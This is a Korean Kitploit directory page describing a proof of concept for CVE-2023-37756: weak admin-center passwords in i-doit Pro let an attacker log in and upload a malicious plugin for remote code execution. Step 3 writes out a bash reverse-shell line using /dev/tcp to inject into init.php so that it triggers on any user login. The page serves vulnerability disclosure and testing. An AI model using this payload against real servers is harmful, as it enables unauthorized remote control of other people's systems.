Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below — CVE-2023-37756에 대한 개념 증명: i-doit Pro admin-center의 취약한 비밀번호 요구 사항으로 인해 무차별 대입 로그인과 악성 플러그인 업로드가 가능해져 원격 코드 실행으로 이어집니다. | Kitploit
도구/GitHubGitHub/leekenghwa/cve-2023-37756-cwe-521-lead-to-malicious-plugin-upload-in-the-i-doit-pro-25-and-below
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationMisconfigurationPayload Development
GitHubleekenghwa/cve-2023-37756-cwe-521-lead-to-malicious-plugin-upload-in-the-i-doit-pro-25-and-below

CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-37756에 대한 개념 증명: i-doit Pro admin-center의 취약한 비밀번호 요구 사항으로 인해 무차별 대입 로그인과 악성 플러그인 업로드가 가능해져 원격 코드 실행으로 이어집니다.

저장소 보기
12년 전아직 검토되지 않음

CVE-2023-37756 – i-doit Pro 25 이하에서 admin-center의 취약한 비밀번호 요구 사항으로 인한 악성 플러그인 업로드

i-doit Pro 25 이하 버전은 admin-center의 취약한 비밀번호 요구 사항과 악성 플러그인 업로드로 인해 RCE(원격 코드 실행) 취약점에 노출됩니다. 이러한 취약점으로 인해 공격자는 쉽게 무차별 대입 공격이나 비밀번호 추측을 통해 admin-center에 접근하고 악성 플러그인을 업로드하여 원격 코드 실행을 달성할 수 있습니다.

제품 설명: i-doit은 synetics GmbH에서 개발한 웹 기반 오픈 소스 IT 문서화 및 CMDB(구성 관리 데이터베이스)입니다. i-doit Pro는 상용 버전으로 유료 라이선스가 필요합니다. 추가 기능, 전문 지원, 정기적인 업데이트 및 개선 사항을 제공합니다. 사용자는 i-doit Pro를 사용하기 위해 라이선스를 구매해야 하며, 비용은 사용자 수와 필요한 기능에 따라 달라집니다.

취약점 설명: 이 웹 애플리케이션의 admin-center 계정 생성 시 비밀번호 요구 사항이 취약하여, 애플리케이션 소유자가 기본 사용자 이름 "admin"으로 최소 1자리의 비밀번호를 설정할 수도 있습니다. 이로 인해 공격자가 쉽게 무차별 대입 공격이나 비밀번호 추측을 통해 admin-center에 접근하고 악성 플러그인을 업로드하여 원격 코드 실행을 달성할 수 있습니다.

영향받는 웹페이지: admin-center 로그인 페이지 및 플러그인 설치

영향받는 매개변수 및 구성 요소: admin-center 로그인 페이지 및 플러그인 설치

1단계: admin-center의 계정 생성 시 비밀번호 요구 사항이나 복잡성이 구현되어 있지 않으므로, 무차별 대입 공격부터 시작할 수 있습니다. 아래 스크린샷은 사용자 이름 "admin"과 비밀번호 "1"로 로그인할 수 있음을 보여줍니다.

Password_1_login_result

step2

2단계: Add-on 탭으로 이동하여 업로드를 선택합니다.

step3

3단계: package.json이 존재해야 하는 등 몇 가지 요구 사항이 있으며, 대상이 모든 클래스와 함수를 확인하기 위해 async를 구현한 것을 발견했습니다. 하지만 고객 포털에서 적절한 플러그인을 다운로드하여 init.php를 편집/추가할 수 있습니다. 이것이 페이로드 트리거 시 시스템 충돌을 방지하는 가장 안전한 방법입니다. 참고: 페이로드가 트리거된 후 시스템 충돌을 방지하려면 줄 끝에 &를 추가하세요. init.php는 페이로드를 주입하기에 가장 좋은 위치입니다. 예: exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");

step4

step5

step6

참고: 다시 zip으로 압축하여 업로드하는 것을 잊지 마세요.

step7

step8

참고: Install을 클릭한 다음 선택한 Add-on을 활성화하세요.

step9

참고: 누군가 로그인할 때(누구든지 가능) 페이로드가 트리거됩니다.

final

도구 다운로드